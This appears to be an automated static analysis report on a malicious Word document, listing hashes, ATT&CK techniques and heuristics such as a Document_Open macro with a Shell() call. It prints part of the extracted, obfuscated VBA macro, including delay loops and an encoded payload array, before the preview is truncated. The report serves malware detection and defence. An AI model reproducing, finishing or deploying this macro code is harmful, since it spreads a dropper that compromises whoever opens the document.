Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f0b3f5b7fee0621f…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 238.0 KB
Created: 2015-12-20 00:46:00
Authoring application: Microsoft Office Word
First seen: 2017-11-29
MD5: 34e0ac68603a48d4fa0e2dc795bb7627
SHA-1: 231921cc65d0d2145d492a8a54877e2ae99df96d
SHA-256: f0b3f5b7fee0621f1a8e8a75c0150c9829a3c48fc6a957a861b13672261d3f66
Risk score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1071.001 Web Protocols

The sample contains a Document_Open VBA macro that runs obfuscated code as soon as the document is opened. The macro calls the Shell() function, indicating an attempt to run external commands or to download and execute a secondary payload. The password-protected archive lure heuristic also fired, which suggests the document is designed to trick the user into supplying a password that decrypts a malicious payload. Taken together, the obfuscated VBA and the Shell() call strongly suggest downloader or dropper functionality.

Heuristics (6)

  • VBA macros detected (severity: medium; 3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical) OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro (severity: high) OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens (severity: high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Password-protected archive handoff (severity: high) SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • Embedded URL (severity: info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    • http://www.iec.ch (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 45842 bytes
SHA-256: 0b3046f781918dc9b8e4cb2ee912ab308176f2b8fdc5be6237d3a5e0c96ac852

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function PKRuK2fNdVxFB Lib "T6lvGFt72exxq" Alias "QcghniC" (ByVal S2fmUIJLe As String, A2Rid9IP8w As Long) As Long
#Else
Private Declare Function PKRuK2fNdVxFB lib "T6lvGFt72exxq" Alias "QcghniC"(byval S2fmUIJLe as String, A2Rid9IP8w as Long ) as Long
#End If
Dim HLnJXH1bmOF3 As String, GyCvq As Integer
Dim GyCvq1() As Variant, GyCvq2() As Variant, GyCvq3() As Variant, GyCvq4() As Variant, GyCvq5() As Variant, GyCvq6() As Variant, GyCvq7() As Variant, GyCvq8() As Variant, GyCvq9() As Variant, GyCvq10() As Variant
Dim GyCvq11() As Variant, GyCvq12() As Variant, GyCvq13() As Variant, GyCvq14() As Variant, GyCvq15() As Variant, GyCvq16() As Variant, GyCvq17() As Variant, GyCvq18() As Variant, GyCvq19() As Variant, GyCvq20() As Variant
Dim GyCvq21() As Variant, GyCvq22() As Variant, GyCvq23() As Variant, GyCvq24() As Variant, GyCvq25() As Variant, GyCvq26() As Variant, GyCvq27() As Variant, GyCvq28() As Variant, GyCvq29() As Variant, GyCvq30() As Variant, GyCvq31() As Variant, GyCvq32() As Variant, GyCvq33() As Variant, GyCvq34() As Variant, GyCvq35() As Variant, GyCvq36() As Variant
Sub Document_Open()
R7O1H2H3zI = 66 + "25"
On Error Resume Next
MD1XgpZ1pvB55y = 22 + "85"
Dim Kf0pgDeD2QME As Long, Bna2eaHvItP2PN As Long, WFoVlONXW2AD As Long, YtJXNbAM10p As Long
Ea7EVpjs = 70 + "46"
Kf0pgDeD2QME = 92238969: Bna2eaHvItP2PN = 0: WFoVlONXW2AD = 0
BzWEvA933 = 88 + "20"
For Bna2eaHvItP2PN = 1 To Kf0pgDeD2QME
WFoVlONXW2AD = WFoVlONXW2AD + 1
Next Bna2eaHvItP2PN
JZL4UQ92uel4B = 23 + "62"
If WFoVlONXW2AD = Kf0pgDeD2QME Then
SeLEK = 56 + "91"
Dim S3VoJ54dB As Integer, B4HWNSKEwh As String
For S3VoJ54dB = 6 To 974
B4HWNSKEwh = B4HWNSKEwh + S3VoJ54dB
Next
JJcm1AOrQT3 = 14 + "18"
YtJXNbAM10p = PKRuK2fNdVxFB("D69lbG7N", 48)
Qio6JWniPunO = 41 + "8"
If (26.5 + 6 + 26.5 - 6) = (26.5 + 8 + 26.5 - 8) Then
SmEqmQo7WIE = 98 + "90"
MYlp4jaVW = 67 + "77"
If zKK(73) = True Then
G2OERK33o = 48 + "8"
SiNwcydd
NsBU3RiWPAsR5kv = 90 + "79"
Else
NhJrp6cE4jcxsT5 = 89 + "58"
MA9o9cPSK5hcO
PMUmGTj7VBjk = 79 + "39"
End If
Else
W1JPoqO = 93 + "45"
MA9o9cPSK5hcO
LIx5J0DQDSAph = 98 + "30"
End If
CxR = 70 + "43"
Else
Yh9QEdd8 = 52 + "97"
MA9o9cPSK5hcO
HxFz4G3yVn = 75 + "27"
End If
HDyHXOIsEi7F = 86 + "94"
End Sub
Sub MA9o9cPSK5hcO()
DRJ9RcaC34U = 10 + "97"
Stop
Partition 58, 6, 35, 21
XmvssUFxoSD = Fix(90)
DateSerial 55, 60, 54
Beep
DateDiff "AyhPtMJO", 63, 89
REQh0kUI80hO = CVErr(10)
Round 50, 76
Resume
Log 51
H6JRAMZiRO1sMhOdf = 20 + "28"
End Sub
Sub JIT9N(PqcAr2DChjNPmswxj As Long)
Ofj = 29 + "74"
Dim MwUs As Long
D8vzZy23Yrz = 26 + "9"
MwUs = Timer + PqcAr2DChjNPmswxj
Do While Timer < MwUs
DoEvents
Loop
KKKBu1p93DmpgX = 77 + "1"
End Sub
Sub SiNwcydd()
G1I0ynas = 45 + "84"
On Error Resume Next
EIbYaWWMmRw = 69 + "45"
GyCvq1() = Array(172, 166, 172, 231, 170, 179, 8, 70, 107, 29, 30, 97, 44, 25, 126, 56, 66, 81, 2, 7, 122, 106, 105, 28, 10, 127, 107, 99, 111, 102, 99, 12, 53, 53, 52, 51, 80, 57, 19, 56, 18, 74, 100, 35, 64, 6, 116, 74, 123, 39, 38, 30, 110, 33, 84, 100, 93, 120, 73, 91, 125, 98, 89, 37, 59, 61, 30, 60, 34, 28, 18, 66, 77, 44, 65, 98, 73, 91, 7, 14, 62, 96, 19, 116, 23, 57, 96, 100, 24, 25, 24, 57, 38, 89, 57, 65, 126, 119, 114, 119, 1, 30, 24, 52, 60, 39, 107, 58, 91, 12, 114, 120, 111, 92, 114, 106, 83, 10, 117, 5, 48, 111, 29, 10, 105, 107, 110, 107, 248, 219, 146, 240, 193, 195, 217, 195, 159, 239, 223, 206, 206, 212, 219, 153, 138, 192, 185, 151, 254, 246, 223, 160, 149, 234, 195, 183, 147, 194, 128, 237, 226, 229, 195, 216, 216, 172, 161, 161, 180, 191, 163, 169, 185, 187, 190, 187, 206, 246, 187, 210, 182, 200, 137, 131, 208, 203, 229, 246, 195, 203, 168, 218, 129, 178, 160, 192, 187, 171, 157, 204, 200, 214, 216)
PeP = 79 + "67"
GyCvq2
... (truncated)